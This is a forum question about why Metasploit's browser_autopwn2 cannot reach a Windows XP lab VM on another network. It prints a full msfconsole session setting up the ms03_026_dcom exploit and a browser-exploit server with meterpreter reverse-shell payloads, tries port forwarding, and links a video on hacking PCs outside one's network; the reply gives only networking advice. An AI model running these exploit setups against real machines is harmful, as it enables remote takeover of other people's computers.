# Browser Autopwn2 Unable to Exploit "Victim" on Separate Network

Tags: metasploit, kali-linux, port-forwarding, windows-xp

Am using VMWare Workstation 10 Player.

Kali Linux OS is Nat
Windows XP is bridge

That means both are on separate networks. I am trying to make Kali Exploit the XP box.

Remote Windows is 192.168.1.9 and Local Kali Host is 192.168.88.129

On Kali I enter below commands. After executing, I enter http://192.168.88.129:8080/4f4Y1H6LJpPSnNg on Windows XP, but get `Page Cannot be Displayed`.

How to troubleshoot?

```
msf > db_status
[*] postgresql connected to msf
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > set RHOST 192.168.1.9
RHOST => 192.168.1.9
msf exploit(ms03_026_dcom) > set RPORT 445
RPORT => 445
msf exploit(ms03_026_dcom) > user auxiliary/server/browser_autopwn2
[-] Unknown command: user.
msf exploit(ms03_026_dcom) > use auxiliary/server/browser_autopwn2
msf auxiliary(browser_autopwn2) > set LHOST 192.168.88.129
LHOST => 192.168.88.129
msf auxiliary(browser_autopwn2) > set HTMLContent Hello!
HTMLContent => Hello!
msf auxiliary(browser_autopwn2) > exploit
[*] Auxiliary module execution completed

[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
msf auxiliary(browser_autopwn2) > [*] Starting listeners...
[*] Time spent: 9.673173624
[*] Using URL: http://0.0.0.0:8080/4f4Y1H6LJpPSnNg
[*] Local IP: http://192.168.88.129:8080/4f4Y1H6LJpPSnNg

[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank       Name                                       Payload
 -----  ----       ----                                       -------
 1      Excellent  samsung_knox_smdm_url                      android/meterpreter/reverse_tcp on 4443
 2      Excellent  webview_addjavascriptinterface             android/meterpreter/reverse_tcp on 4443
 3      Excellent  firefox_proto_crmfrequest                  firefox/shell_reverse_tcp on 4442
 4      Excellent  firefox_webidl_injection                   firefox/shell_reverse_tcp on 4442
 5      Excellent  firefox_svg_plugin                         firefox/shell_reverse_tcp on 4442
 6      Excellent  firefox_tostring_console_injection         firefox/shell_reverse_tcp on 4442
 7      Great      adobe_flash_uncompress_zlib_uaf            windows/meterpreter/reverse_tcp on 4444
 8      Great      adobe_flash_hacking_team_uaf               windows/meterpreter/reverse_tcp on 4444
 9      Great      adobe_flash_shader_drawing_fill            windows/meterpreter/reverse_tcp on 4444
 10     Great      adobe_flash_nellymoser_bof                 windows/meterpreter/reverse_tcp on 4444
 11     Great      adobe_flash_opaque_background_uaf          windows/meterpreter/reverse_tcp on 4444
 12     Great      adobe_flash_pixel_bender_bof               windows/meterpreter/reverse_tcp on 4444
 13     Great      adobe_flash_net_connection_confusion       windows/meterpreter/reverse_tcp on 4444
 14     Great      adobe_flash_shader_job_overflow            windows/meterpreter/reverse_tcp on 4444
 15     Great      adobe_flash_casi32_int_overflow            windows/meterpreter/reverse_tcp on 4444
 16     Great      adobe_flash_copy_pixels_to_byte_array      windows/meterpreter/reverse_tcp on 4444
 17     Great      adobe_flash_worker_byte_array_uaf          windows/meterpreter/reverse_tcp on 4444
 18     Great      adobe_flash_domain_memory_uaf              windows/meterpreter/reverse_tcp on 4444
 19     Good       adobe_flash_uncompress_zlib_uninitialized  windows/meterpreter/reverse_tcp on 4444
 20     Good       wellintech_kingscada_kxclientdownload      windows/meterpreter/reverse_tcp on 4444
 21     Good       ms14_064_ole_code_execution                windows/meterpreter/reverse_tcp on 4444

[*] Starting the payload handler...
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.88.129:8080/4f4Y1H6LJpPSnNg
[*] Server started.
msf auxiliary(browser_autopwn2) >
```

#### Update

Trying to follow this video, [How to hack any PC remotely outside of your network](https://youtu.be/hKF9NZw5iY0?t=3m43s), except I have Verizon.

I tried to enable Port Forwarding on Verizon Wireless Router.

In first case I specified

```
IP Address: 192.168.88.129

Src Port: 4444

Dst Port: 4444
```

In second case I specified

```
IP Address: 192.168.88.129

Src Port: Any

Dst Port: 8080
```

But still no luck :-(

[image]

[image]

Comment: I know it's a pain to pivot to this, but have you considered using two VMs instead? If you're not experienced at networking or configuring this kind of communication, then VMs will be much easier to work with.

Comment: @PrestonBadeer Hey that's a great idea. Will do this when I revisit.

Answer (score 1):

Since they're on two separate networks, how are they going to communicate? is there a GATEWAY that they share or similar that would allow them to communicate?

If so, might want to test simple network connections before http. If you can get ping, but not http, maybe try tracepath or something of the sort that'll let you test the route per port. Alternatively, we could probably answer better for this case if we knew the routes at least.

Cause, if a windows box is on a bridge interface, and linux on the nat interface, you'd need (at minimum) at gateway the windows box understands is its gateway to use to get to the kali box before it's going to. If you use the default gateway, the windows box will default with whatever is manually set, or pulled via dhcp.

That's my thoughts at least. Doesn't seem to be an issue with your command set. Though, you can always test to make sure you're listening properly using curl, netcat, whatever.

Comment: `is there a GATEWAY that they share or similar that would allow them to communicate?` How to set this up? Ultimately, I would like to model real-life environment where two computers on separate networks are connected via the Internet.

Comment: See updated question